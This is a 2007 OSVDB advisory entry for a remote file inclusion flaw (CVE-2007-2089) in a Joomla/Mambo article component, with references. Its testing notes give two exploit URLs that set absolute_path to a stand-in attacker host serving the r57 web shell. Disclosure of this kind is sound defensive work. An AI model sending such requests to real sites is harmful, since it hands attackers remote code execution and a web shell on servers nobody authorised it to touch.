Jx Development Article for Joomla/Mambo com_articles.php absolute_path Variable Remote File Inclusion

2007-04-14T00:00:00
ID OSVDB:34802
Type osvdb
Reporter OSVDB
Modified 2007-04-14T00:00:00

Description

Manual Testing Notes

http://[target]/joomla_path/components/com_articles.php?absolute_path=http://[attacker]/r57.txt? http://[target]/joomla_path/classes/html/com_articles.php?absolute_path=http://[attacker]/r57.txt?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0293.html ISS X-Force ID: 33663 Generic Exploit URL: http://www.milw0rm.com/exploits/3736 FrSIRT Advisory: ADV-2007-1394 CVE-2007-2089 Bugtraq ID: 23513